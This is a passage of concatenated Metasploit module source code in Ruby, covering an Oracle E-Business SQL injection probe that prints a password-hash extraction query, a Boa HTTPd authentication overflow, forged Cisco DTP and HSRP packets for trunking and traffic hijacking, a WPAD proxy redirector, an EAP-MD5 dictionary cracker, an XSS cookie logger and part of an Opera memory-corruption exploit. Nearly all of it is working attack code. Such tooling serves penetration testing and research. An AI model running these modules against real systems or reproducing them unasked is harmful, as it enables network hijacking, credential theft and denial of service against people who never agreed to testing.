")[1,5].join(" ")}\n" 69 | report <<"Server \t: #{rdata['server']}\n" if rdata['server'] 70 | report << "User-Agent \t: #{rdata['agent']}\n" if rdata['agent'] 71 | print_good(report) 72 | 73 | report_auth_info( 74 | :host => dest_addr, 75 | :port => datastore['RPORT'], 76 | :sname => 'sip', 77 | :proof => nil, 78 | :source_type => "user_supplied", 79 | :active => true 80 | ) 81 | else 82 | vprint_status("#{dest_addr}:#{dest_port} : #{convert_error(result)}") 83 | end 84 | 85 | #Debug 86 | if datastore['DEBUG'] == true 87 | if rdata !=nil 88 | report = "#{rdata['source']}\tresponse: #{rdata['resp_msg'].split(" ")[1,5].join(" ")}\n" 89 | report <<"Server \t: #{rdata['server']}\n" if rdata['server'] 90 | report <<"User-Agent \t: #{rdata['agent']}\n" if rdata['agent'] 91 | report <<"Realm \t: #{rdata['digest']['realm']}\n" if rdata['digest'] 92 | print_debug(report) 93 | end 94 | 95 | rawdata.split("\n").each { |r| print_debug("Response Details: #{r}") } if rdata != nil 96 | rdebug.each { |r| print_debug("Irrelevant Responses : #{r['resp']} #{r['resp_msg']}") } if rdebug 97 | end 98 | end 99 | end 100 | 101 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/sip/vsipproxy.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 
5 | # http://metasploit.com/framework/ 6 | ## 7 | 8 | 9 | require 'msf/core' 10 | require 'rex/proto/sip' 11 | 12 | class Metasploit3 < Msf::Auxiliary 13 | 14 | include Msf::Auxiliary::Report 15 | include Msf::Auxiliary::SIP 16 | 17 | def initialize 18 | super( 19 | 'Name' => 'SIP Proxy with Auto Replace Support', 20 | 'Version' => '$Revision$', 21 | 'Description' => 'SIP Proxy with Auto Replace Support', 22 | 'Author' => 'Fatih Ozavci ', 23 | 'License' => MSF_LICENSE 24 | ) 25 | 26 | deregister_options('RHOST','RHOSTS','RPORT') 27 | register_options( 28 | [ 29 | OptAddress.new('PRXCLT_IP', [true, 'Local IP of SIP Server for Client']), 30 | OptInt.new('PRXCLT_PORT', [true, 'Local UDP Port of SIP Server for Client',5061]), 31 | OptAddress.new('PRXSRV_IP', [true, 'Local IP of SIP Server for Server']), 32 | OptInt.new('PRXSRV_PORT', [true, 'Local UDP Port of SIP Server for Server',5060]), 33 | OptAddress.new('CLIENT_IP', [true, 'IP of SIP Client']), 34 | OptInt.new('CLIENT_PORT', [true, 'Port of SIP Client',5060]), 35 | OptAddress.new('SERVER_IP', [true, 'IP of Remote SIP Server']), 36 | OptInt.new('SERVER_PORT', [true, 'Port of Remote SIP Server',5060]), 37 | OptPath.new('CONF_FILE', [ false, "File containing Replacements, one per line", 38 | #File.join(Msf::Config.install_root, "data", "wordlists", "sipproxy_replace.txt") ]), 39 | File.join("/", "tmp", "sipproxy_replace.txt") ]), 40 | OptBool.new('LOG', [ true, "Logging for Requests and Responses", false]), 41 | ], self.class) 42 | 43 | register_advanced_options( 44 | [ 45 | OptBool.new('DEBUG', [ false, "Verbose Level", false]), 46 | OptBool.new('VERBOSE', [ false, "Verbose Level", false]) 47 | ], self.class) 48 | end 49 | 50 | def run 51 | client_ip = datastore['CLIENT_IP'] 52 | client_port = datastore['CLIENT_PORT'] 53 | server_ip = datastore['SERVER_IP'] 54 | server_port = datastore['SERVER_PORT'] 55 | 56 | prxclient_ip = datastore['PRXCLT_IP'] 57 | prxclient_port = datastore['PRXCLT_PORT'] 58 | prxserver_ip = 
datastore['PRXSRV_IP'] 59 | prxserver_port = datastore['PRXSRV_PORT'] 60 | 61 | 62 | start_sipprx(prxclient_port,prxclient_ip,client_port,client_ip,prxserver_port,prxserver_ip,server_port,server_ip) 63 | set_replacefile(datastore['CONF_FILE']) if datastore['CONF_FILE'] 64 | set_logfile(File.join("/", "tmp", "sipproxylog-#{rand(0x10000000)}.log")) if datastore['LOG'] 65 | start_monitor 66 | 67 | begin 68 | # Wait for finish... 69 | while self.thread.alive? 70 | select(nil, nil, nil, 2) 71 | end 72 | rescue 73 | nil 74 | ensure 75 | stop 76 | end 77 | end 78 | 79 | end 80 | -------------------------------------------------------------------------------- /modules/auxiliary/securestate/proxy_config.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Auxiliary 15 | include Msf::Exploit::Remote::HttpServer 16 | 17 | def initialize(info = {}) 18 | super(update_info(info, 19 | 'Name' => 'WPAD/PAC Proxy Config Server', 20 | 'Description' => %q{ 21 | This module facilitates serving up a preconfigured WPAD.DAT 22 | file. This is useful when using the nbns_response module 23 | to configure clients to use a specified proxy. 24 | 25 | If DEFUALT is set to 'BYPASS' DOMAINS is a list of domains 26 | that the victim will redirect to the proxy. If DEFAULT is 27 | set to 'INTERCEPT' DOMAINS is a list of domains that the victim 28 | will not send through the proxy. 29 | 30 | The SKIPSSL option can be used to not intercept sites using 31 | HTTPS, this is useful for avoiding invalid certificate errors. 
32 | }, 33 | 'Author' => 34 | [ 35 | 'Spencer McIntyre', 36 | 'SecureState R&I Team', # SecureState Research and Innovation Team 37 | ], 38 | 'License' => MSF_LICENSE, 39 | 'DefaultOptions' => 40 | { 41 | 'SRVPORT' => 80, 42 | 'URIPATH' => '/wpad.dat' 43 | }, 44 | 'Actions' => 45 | [ 46 | [ 'Service' ] 47 | ], 48 | 'PassiveActions' => [ 'Service' ], 49 | 'DefaultAction' => 'Service' 50 | )) 51 | deregister_options('SSL', 'SSLCert', 'SSLVersion', 'URIPATH') 52 | register_options( 53 | [ 54 | OptString.new('PROXYHOST', [ true, 'Host for victims to use as a proxy', nil ]), 55 | OptInt.new('PROXYPORT', [ true, 'Port for victims to use as a proxy', 8080 ]), 56 | OptString.new('DOMAINS', [ false, 'Comma seperated list of domains to handle differently', '' ]), 57 | OptString.new('DEFAULT', [ false, 'Default action for domains not specified (INTERCEPT or BYPASS)', 'INTERCEPT']), 58 | OptBool.new('SKIPSSL', [ true, 'Do not proxy requests for HTTPS resources', true ]), 59 | ], self.class) 60 | end 61 | 62 | def run 63 | default = datastore['DEFAULT'].upcase 64 | if (default != 'INTERCEPT') and (default != 'BYPASS') 65 | print_error("DEFAULT must be either INTERCEPT or BYPASS") 66 | return 67 | end 68 | @wpad_data = create_wpad_file(datastore['PROXYHOST'], datastore['PROXYPORT'], datastore['DOMAINS'], default, datastore['SKIPSSL']) 69 | exploit 70 | end 71 | 72 | # Handle incoming requests from the server 73 | def on_request_uri(cli, request) 74 | send_response(cli, @wpad_data, { 'Content-Type' => "application/x-ns-proxy-autoconfig" } ) 75 | end 76 | 77 | def create_wpad_file(proxy_server, proxy_port, domains, default, skipssl) 78 | if domains == nil 79 | domains = [] 80 | else 81 | domains = domains.split(',') 82 | end 83 | if default == "INTERCEPT" 84 | non_default = "DIRECT" 85 | else 86 | non_default = "PROXY #{proxy_server}:#{proxy_port}" 87 | end 88 | 89 | wpad = "function FindProxyForURL(url, host)\n" 90 | wpad << "{\n" 91 | if skipssl 92 | wpad << "if 
(url.substring(0, 6) == \"https:\") { return \"DIRECT\"; }\n" 93 | end 94 | 95 | for domain in domains 96 | wpad << "if (dnsDomainIs(host, \"#{domain}\")) { return \"#{non_default}\"; }\n" 97 | end 98 | 99 | if default == "INTERCEPT" 100 | wpad << "return \"PROXY #{proxy_server}:#{proxy_port}\";\n" 101 | else 102 | wpad << "return \"DIRECT\";\n" 103 | end 104 | wpad << "}\n" 105 | wpad 106 | end 107 | end 108 | -------------------------------------------------------------------------------- /modules/auxiliary/sqli/oracle_erp_sqli1.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/projects/Framework/ 6 | ## 7 | #######################oracle_ebusiness_suite_sqli############################ 8 | 9 | require 'msf/core' 10 | 11 | class Metasploit3 < Msf::Auxiliary 12 | 13 | include Msf::Auxiliary::Report 14 | include Msf::Exploit::Remote::HttpClient 15 | include Msf::Auxiliary::Scanner 16 | def initialize 17 | super( 18 | 'Name' => 'Oracle E-Business Suite SQL Injection 11.5.1-11.5.10.2.(R12)', 19 | 'Description' => %q{ 20 | This module makes a request to the Oracle Application Server (tested against Oracle HRMS [self service]) 21 | in an attempt to find some of the vulnerabilities described by Joxean Koret. 
It will also try to find DAD to be used with /pls/ 22 | }, 23 | 'Version' => '$Revision:$', 24 | 'References' => 25 | [ 26 | [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' 27 | ], 28 | ], 29 | 'Author' => [ 'KP' ], 30 | 'License' => MSF_LICENSE 31 | ) 32 | 33 | register_options([Opt::RPORT(8000),], self.class) 34 | end 35 | def run_host(ip) 36 | begin 37 | finddad = send_request_raw({ 38 | 'uri' => '/OA_HTML/biserror.jsp?DBC=DOESNOTEXIST', 39 | 'method' => 'GET', 40 | 'version' => '1.1', 41 | }, 5) 42 | 43 | if ( finddad.body =~ /pls/ ) 44 | sleep(2) 45 | tempdad = finddad.body.scan(/\/pls\/(.*)\//) 46 | report_note( 47 | :host => ip, 48 | :proto => 'tcp', 49 | :type => 'SERVICE_NAME', 50 | :data => "#{tempdad.uniq}" 51 | ) 52 | tempdad1 = $1 53 | tempdad2 = tempdad1.split("/") 54 | finaldad = tempdad2.first 55 | print_status("Discovered DAD: '#{finaldad}' for host #{ip}") 56 | else 57 | print_error("Unable to retrieve DAD for #{ip}...") 58 | end 59 | supplieruri = "/pls/#{finaldad}/ICXSUPWF.DISPLAYCONTACTS" 60 | print_status ("Looking for supplier infor at '#{supplieruri}'") 61 | findsupplier = send_request_raw({ 62 | 'uri' => "#{supplieruri}", 63 | 'method' => 'GET', 64 | 'version' => '1.1', 65 | }, 5) 66 | if ((findsupplier.body =~ /Supplier Contacts/) && (findsupplier.body =~ /Company Address/)) 67 | sleep(2) 68 | print_status("Supplier contacts found on '#{supplieruri}'") 69 | print_status("Find password hashes on 70 | '#{supplieruri}'?p_where=2>1%20union%20select%20username,password,null,null,null,null%20from%20dba_users;") 71 | else 72 | print_error("Supplier info not found") 73 | end 74 | 75 | rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout 76 | rescue ::Timeout::Error, ::Errno::EPIPE 77 | end 78 | end 79 | end 80 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/boa_auth_dos.rb: 
-------------------------------------------------------------------------------- 1 | ## 2 | # $Id: boa_auth_dos.rb 15014 2012-06-06 15:13:11Z rapid7 $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # web site for more information on licensing and terms of use. 9 | # http://metasploit.com/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Auxiliary 15 | 16 | include Msf::Exploit::Remote::HttpClient 17 | include Msf::Auxiliary::Dos 18 | 19 | def initialize(info = {}) 20 | super(update_info(info, 21 | 'Name' => 'Boa HTTPd Basic Authentication Overflow', 22 | 'Description' => 23 | %q{ 24 | The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11 25 | allows denial of service or possibly authentication bypass 26 | via a Basic Authentication header with a user string greater than 127 characters. You must set 27 | the request URI to the directory that requires basic authentication. 
28 | }, 29 | 'Author' => 30 | [ 31 | 'Luca "ikki" Carettoni ', #original discoverer 32 | 'Claudio "paper" Merloni ', #original discoverer 33 | 'Max Dietz ' #metasploit module 34 | ], 35 | 'License' => MSF_LICENSE, 36 | 'Version' => '$Revision$', 37 | 'References' => 38 | [ 39 | [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'], 40 | ], 41 | 'DisclosureDate' => 'Sep 10 2007')) 42 | 43 | register_options( 44 | [ 45 | Opt::RPORT(80), 46 | OptString.new('URI', [ true, "The request URI", '/']), 47 | OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass']) 48 | ], self.class) 49 | end 50 | 51 | def check 52 | begin 53 | res = send_request_cgi({ 54 | 'uri'=>'/', 55 | 'method'=>'GET' 56 | }) 57 | if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) 58 | print_status("Boa Version Detected: #{m[1]}") 59 | return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version 60 | return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) 61 | return Exploit::CheckCode::Vulnerable 62 | else 63 | print_status("Not a Boa Server!") 64 | return Exploit::CheckCode::Safe # not a boa server 65 | end 66 | rescue Rex::ConnectionRefused 67 | print_error("Connection refused by server.") 68 | return Exploit::CheckCode::Safe 69 | end 70 | end 71 | 72 | def run 73 | if check == Exploit::CheckCode::Vulnerable 74 | datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127) 75 | datastore['BasicAuthPass'] = datastore['PASSWORD'] 76 | res = send_request_cgi({ 77 | 'uri'=> datastore['URI'], 78 | 'method'=>'GET' 79 | }) 80 | if (res != nil) 81 | print_status("Server still operational... 
checking to see if password has been overwritten.") 82 | datastore['BasicAuthUser'] = 'admin' 83 | res = send_request_cgi({ 84 | 'uri'=>datastore['URI'], 85 | 'method'=>'GET' 86 | }) 87 | if (res.code == 200) 88 | print_status("Access successful with admin:#{datastore['PASSWORD']}") 89 | elsif (res.code != 401) 90 | print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered") 91 | else 92 | print_status("Access forbidden, this module has failed.") 93 | end 94 | else 95 | print_status("Denial of Service has succeeded.") 96 | end 97 | end 98 | end 99 | end 100 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/dtp.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | require 'racket' 14 | 15 | class Metasploit3 < Msf::Auxiliary 16 | 17 | include Msf::Exploit::Capture 18 | 19 | def initialize(info = {}) 20 | super(update_info(info, 21 | 'Name' => 'Forge Cisco DTP Packets', 22 | 'Description' => %q{ 23 | This module forges DTP packets to initialize a trunk port. 
24 | }, 25 | 'Author' => [ 'Spencer McIntyre' ], 26 | 'License' => MSF_LICENSE, 27 | 'Version' => '$Revision$', 28 | 'Actions' => 29 | [ 30 | [ 'Service' ] 31 | ], 32 | 'PassiveActions' => 33 | [ 34 | 'Service' 35 | ], 36 | 'DefaultAction' => 'Service' 37 | )) 38 | register_options( 39 | [ 40 | OptString.new('DOMAIN', [ false, "DTP Domain Name", '']), 41 | OptString.new('IFACE', [ true, "Interface To Use", 'eth0']), 42 | ], self.class) 43 | end 44 | 45 | def run 46 | n = Racket::Racket.new 47 | @run = true 48 | domain = datastore['DOMAIN'] 49 | if domain == "" 50 | domain = "\x00\x00\x00\x00\x00\x00\x00\x00\x00" 51 | end 52 | 53 | n.l2 = Racket::L2::Ethernet.new() 54 | n.l2.dst_mac = '01:00:0c:cc:cc:cc' #this has to stay the same 55 | n.l2.ethertype = (domain.length + 34) 56 | 57 | n.l3 = Racket::L2::LLC.new() 58 | n.l3.control = 0x03 59 | n.l3.dsap = 0xaa 60 | n.l3.ssap = 0xaa 61 | cisco_vendor_code = "\x00\x00\x0c" 62 | pid = "\x20\x04" #2004 is DTP 63 | payload = cisco_vendor_code + pid 64 | 65 | #DTP info section 66 | dtp_version = "\x01" 67 | 68 | dtp_domain_type = "\x00\x01" 69 | dtp_domain_len = [ (domain.length + 5) ].pack("n") 70 | dtp_domain = domain + "\x00" 71 | dtp_domain_section = dtp_domain_type 72 | dtp_domain_section << dtp_domain_len 73 | dtp_domain_section << dtp_domain 74 | 75 | dtp_status_type = "\x00\x02" 76 | dtp_status_len = "\x00\x05" 77 | dtp_status = "\x03" 78 | dtp_status_section = dtp_status_type 79 | dtp_status_section << dtp_status_len 80 | dtp_status_section << dtp_status 81 | 82 | dtp_type_type = "\x00\x03" 83 | dtp_type_len = "\x00\x05" 84 | dtp_type = "\xa5" 85 | dtp_type_section = dtp_type_type 86 | dtp_type_section << dtp_type_len 87 | dtp_type_section << dtp_type 88 | 89 | dtp_neighbor_type = "\x00\x04" 90 | dtp_neighbor_len = "\x00\x0a" 91 | dtp_neighbor = "\x11\x22\x33\x44\x55\x66" 92 | dtp_neighbor_section = dtp_neighbor_type 93 | dtp_neighbor_section << dtp_neighbor_len 94 | dtp_neighbor_section << dtp_neighbor 95 | 96 | 
payload << dtp_version 97 | payload << dtp_domain_section 98 | payload << dtp_status_section 99 | payload << dtp_type_section 100 | payload << dtp_neighbor_section 101 | n.l3.payload = payload 102 | 103 | n.iface = datastore['IFACE'] 104 | n.pack() 105 | while @run 106 | n.send2() 107 | select(nil, nil, nil, 30) 108 | end 109 | 110 | end 111 | 112 | end 113 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/eap_md5_dict.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | require 'packetfu' 15 | 16 | class Metasploit3 < Msf::Auxiliary 17 | 18 | include Msf::Exploit::Capture 19 | include Msf::Auxiliary::Report 20 | 21 | def initialize 22 | super( 23 | 'Name' => 'EAP-MD5 challenge dictionary attack.', 24 | 'Description' => %q{ 25 | This module launch a dictionary attack against an EAP-MD5 challenge. 26 | The PCAP should contains at least the following requests: 27 | EAP reponse, identity (contains the username) 28 | EAP request, MD5-challenge 29 | EAP response, MD5-challenge 30 | EAP success (the module validate the authentication was succesful) 31 | 32 | Compatible with wired and 802.11 - 802.1x environments. 
33 | }, 34 | 'Author' => 35 | [ 36 | 'pello ' 37 | ], 38 | 'License' => MSF_LICENSE, 39 | 'Version' => '$Revision$' 40 | ) 41 | 42 | begin 43 | require 'pcaprub' 44 | @@havepcap = true 45 | rescue ::LoadError 46 | @@havepcap = false 47 | end 48 | 49 | register_options( 50 | [ 51 | OptString.new('WORDLIST', [ true, "Wordlist file for challenge bruteforce.", '']) 52 | ], self.class) 53 | 54 | deregister_options('RHOST','NETMASK','TIMEOUT','FILTER','SNAPLEN','INTERFACE') 55 | 56 | end 57 | 58 | def find_eap_challenge 59 | eapinfo = Hash.new 60 | cap = PacketFu::PcapFile.new.f2a(:filename => datastore['PCAPFILE']) 61 | cap.each do |pkt| 62 | begin 63 | case pkt[30,4].unpack('H4').join 64 | when "888e" # 802.11 65 | if pkt[36].to_i == 2 and pkt[40].to_i == 4 66 | eapinfo['resp'] = pkt[42..(42 + pkt[41] - 1)] 67 | eapinfo['id'] = pkt[37] 68 | elsif pkt[36].to_i == 1 and pkt[40].to_i == 4 69 | eapinfo['req'] = pkt[42..(42 + pkt[41] - 1)] 70 | elsif pkt[36].to_i == 2 and pkt[40].to_i == 1 71 | eapinfo['user'] = pkt[42..(42 + pkt[41] - 1)] 72 | elsif pkt[36].to_i == 3 73 | eapinfo['status'] = true 74 | else 75 | next 76 | end 77 | end 78 | case pkt[12,4].unpack('H4').join 79 | when "888e" # 802.3 80 | if pkt[18].to_i == 2 and pkt[22].to_i == 4 81 | eapinfo['resp'] = pkt[24..(24 + pkt[23] - 1)] 82 | eapinfo['id'] = pkt[19] 83 | elsif pkt[18].to_i == 1 and pkt[22].to_i == 4 84 | eapinfo['req'] = pkt[24..(24 + pkt[23] - 1)] 85 | elsif pkt[18].to_i == 2 and pkt[22].to_i == 1 86 | eapinfo['user'] = pkt[24..(24 + pkt[23] - 1)] 87 | elsif pkt[18].to_i == 3 88 | eapinfo['status'] = true 89 | else 90 | next 91 | end 92 | end 93 | if data.length == 5 then break end 94 | rescue 95 | next 96 | end 97 | end 98 | eapinfo 99 | end 100 | 101 | def compare_challenge_and_passwords(reqchallenge, respchallenge, id, user) 102 | correctpass = "" 103 | print_status("Passwords loaded from #{datastore['WORDLIST']}") 104 | File.open(datastore['WORDLIST'],"r").each_line do |p| 105 | md5 = 
Rex::Text.md5(2.chr + p.rstrip + reqchallenge) 106 | if md5 == respchallenge.unpack('H2'*respchallenge.length).join 107 | correctpass = p 108 | break 109 | end 110 | end 111 | if correctpass.empty? 112 | print_error("Password not found.") 113 | else 114 | print_good("The login/password is: #{user}/#{correctpass}") 115 | report_note( 116 | :type => 'EAP-MD5', 117 | :user => user, 118 | :pass => correctpass) 119 | end 120 | 121 | end 122 | 123 | def run 124 | 125 | print_status("Looking for EAP-MD5 challenge in #{datastore['PCAPFILE']}") 126 | 127 | eap = find_eap_challenge 128 | if !defined? eap['req'] or !defined? eap['resp'] 129 | print_error("There is no EAP-MD5 challenge in the PCAP file") 130 | elsif !eap['status'] 131 | print_error("There is no succesful EAP-MD5 challenge in the PCAP file") 132 | else 133 | compare_challenge_and_passwords(eap['req'], eap['resp'], eap['id'], eap['user']) 134 | end 135 | 136 | end 137 | 138 | 139 | end 140 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/enum_bing_url.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # Framework web site for more information on licensing and terms of use. 5 | # http://metasploit.com/framework/ 6 | ## 7 | 8 | require 'msf/core' 9 | 10 | class Metasploit3 < Msf::Auxiliary 11 | 12 | include Msf::Auxiliary::Report 13 | include Msf::Auxiliary::Scanner 14 | include Msf::Exploit::Remote::Tcp 15 | 16 | def initialize(info = {}) 17 | super(update_info(info, 18 | 'Name' => 'Bing URL Enumerator', 19 | 'Description' => %q{ 20 | This module uses Bing to enumerate URLs from a specified range of IP addresses. 
21 | }, 22 | 'Author' => [ 'Royce Davis ' ], 23 | 'License' => MSF_LICENSE 24 | )) 25 | 26 | deregister_options('RHOST','RPORT','VHOST') 27 | end 28 | 29 | def cleanup 30 | datastore['RHOST'] = @old_rhost 31 | datastore['RPORT'] = @old_rport 32 | end 33 | 34 | def run_host(ip) 35 | urls = [] 36 | @old_rhost = datastore['RHOST'] 37 | @old_rport = datastore['RPORT'] 38 | 39 | datastore['RHOST'] = 'www.bing.com' 40 | datastore['RPORT'] = 80 41 | 42 | # We cannot use HttpClient to send a query to bing.com, 43 | # because there is a bug in get_once that keeps bailing on us before finishing 44 | # getting the data. get_once is the actual function used to receive HTTP data 45 | # for send_request_cgi(). See the following ticket for details: 46 | # http://dev.metasploit.com/redmine/issues/6499#note-11 47 | connect 48 | req = %Q|GET /search?q=ip:#{ip} HTTP/1.1\nHost: #{datastore['RHOST']}\nAccept: */*\n 49 | | 50 | 51 | req = req.gsub(/^\t\t/, '') 52 | sock.put(req) 53 | res = sock.get(-1, 1) 54 | m = res.to_s.scan(/([a-z0-9]+(?:[\-\.])[a-z0-9]+(?:[\-\.])[a-z]{3,5})/) 55 | 56 | if m.empty? 57 | print_error("No matches found for #{ip}") 58 | return 59 | end 60 | 61 | m.each do |url| 62 | url = url.to_s.gsub(//, '') 63 | 64 | # The URL returns in the following format: 65 | # ["www.example.com"] 66 | if url =~ /\[\"(.+)\"\]/ 67 | urls << $1 68 | print_status("#{ip} = #{$1}") 69 | end 70 | end 71 | 72 | unless urls.empty? 73 | report_note( 74 | :host => ip, 75 | :data => urls, 76 | :type => 'URL' 77 | ) 78 | end 79 | end 80 | end 81 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/hsrp_hijack.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: $ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. 
Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | 13 | require 'msf/core' 14 | require 'racket' 15 | 16 | class Metasploit3 < Msf::Auxiliary 17 | 18 | include Msf::Exploit::Capture 19 | 20 | def initialize 21 | super( 22 | 'Name' => 'Cisco HSRP traffic hijacking.', 23 | 'Description' => %q{ 24 | This module will direct LAN traffic to the attacker host if HSRP is present. 25 | }, 26 | 'Author' => [ 'pello' ], 27 | 'License' => MSF_LICENSE, 28 | 'Version' => '$Revision$' 29 | ) 30 | register_options( 31 | [ 32 | Opt::RPORT(1985), 33 | OptString.new('INTERFACE', [true, "The name of the interface", 'eth0']) 34 | ], self.class) 35 | 36 | deregister_options('PCAPFILE','SNAPLEN','FILTER') 37 | 38 | begin 39 | require 'pcaprub' 40 | @@havepcap = true 41 | rescue ::LoadError 42 | @@havepcap = false 43 | end 44 | end 45 | 46 | def hsrp_listen 47 | pcap = Pcap::open_live(datastore['INTERFACE'], 1500, false, 3) 48 | pcap.setfilter("host 224.0.0.2 and udp port 1985") 49 | begin 50 | print_status("Sniffing traffic.....") 51 | Timeout.timeout(3) do 52 | pcap.each do |pkt| 53 | eth = Racket::L2::Ethernet.new(pkt) 54 | ip = Racket::L3::IPv4.new(eth.payload) 55 | udp = Racket::L4::UDP.new(ip.payload) 56 | hsrp = Racket::L5::HSRP.new(udp.payload) 57 | @hsrp_group = hsrp.group 58 | @hsrp_vip = hsrp.vip 59 | @hsrp_password = hsrp.password 60 | return true 61 | end 62 | end 63 | rescue Timeout::Error 64 | return false 65 | end 66 | 67 | end 68 | 69 | def run 70 | 71 | raise "Pcaprub is not available" if not @@havepcap 72 | 73 | @run = false 74 | @hsrp_group = 1 75 | @hsrp_priority = 254 76 | @hsrp_vip = "" 77 | @hsrp_password = "cisco" 78 | 79 | if hsrp_listen 80 | print_status("Vip: " << @hsrp_vip << " Group: " << @hsrp_group.to_s << " Password: " << @hsrp_password) 81 | print_good("Start traffic hijacking.....") 82 | 83 | else 84 | print_error("No HSRP traffic.") 85 | return 
false 86 | end 87 | 88 | @run = true 89 | 90 | n = Racket::Racket.new 91 | n.l2 = Racket::L2::Ethernet.new 92 | n.l2.ethertype = 0x0800 93 | n.l2.dst_mac = "01:00:5e:00:00:02" 94 | n.l3 = Racket::L3::IPv4.new 95 | n.l3.src_ip = datastore['RHOST'] 96 | n.l3.dst_ip = "224.0.0.2" 97 | n.l3.protocol = 0x11 98 | n.l4 = Racket::L4::UDP.new 99 | n.l4.src_port = 1985 100 | n.l4.dst_port = 1985 101 | n.l5 = Racket::L5::HSRP.new 102 | n.l5.group = @hsrp_group 103 | n.l5.priority = @hsrp_priority 104 | n.l5.password = @hsrp_password 105 | n.l5.opcode = 0 106 | n.l5.state = 16 107 | n.l5.vip = @hsrp_vip 108 | 109 | n.l4.payload = n.l5 110 | n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) 111 | n.l4.payload = "" 112 | 113 | n.iface = datastore['INTERFACE'] 114 | n.pack() 115 | while @run 116 | n.send2() 117 | select(nil, nil, nil, 3) 118 | end 119 | 120 | end 121 | 122 | end 123 | -------------------------------------------------------------------------------- /modules/auxiliary/unstable/http_javascript_cookielogger.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This file is part of the Metasploit Framework and may be subject to 3 | # redistribution and commercial restrictions. Please see the Metasploit 4 | # web site for more information on licensing and terms of use. 5 | # http://metasploit.com 6 | ## 7 | 8 | require 'msf/core' 9 | 10 | class Metasploit3 < Msf::Auxiliary 11 | 12 | include Msf::Exploit::Remote::HttpServer::HTML 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Capture: HTTP Logging Of Cookies', 17 | 'Description' => %q{ 18 | This module runs a webserver that serves a piece of javascript 19 | which will transmit cookies back to metasploit. In an attempt 20 | to evade analysis and Intrusion Detection Systems this module has 21 | an option to obfuscate the served javascript. 
22 | To use this module the following javascript must be injected on a 23 | website vulnerable to XSS: 24 | 97 | | 98 | 99 | # Transmit the compressed response to the client 100 | send_response(cli, html, { 'Content-Type' => 'text/html' }) 101 | 102 | # Handle the payload 103 | handler(cli) 104 | 105 | end 106 | 107 | end 108 | -------------------------------------------------------------------------------- /modules/exploits/unstable/incomplete/windows/browser/opera_content_length.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # Framework web site for more information on licensing and terms of use. 9 | # http://metasploit.com/framework/ 10 | ## 11 | 12 | require 'msf/core' 13 | 14 | class Metasploit3 < Msf::Exploit::Remote 15 | Rank = AverageRanking 16 | 17 | # 18 | # This module acts as an HTTP server 19 | # 20 | include Msf::Exploit::Remote::HttpServer::HTML 21 | 22 | def initialize(info = {}) 23 | super(update_info(info,{ 24 | 'Name' => '[INCOMPLETE] Opera <= 10.50 Content-Length Memory Corruption', 25 | 'Description' => %q{ 26 | This module triggers a vulnerability in Opera 10.50 and 10.10 that allows 27 | an attacker to specify the copy length for a memcpy(). See references for more 28 | information. 29 | 30 | In its current state, this module is only capable of causing a crash. With 31 | some heap sculpting it is reportedly possible to cause code execution instead. 
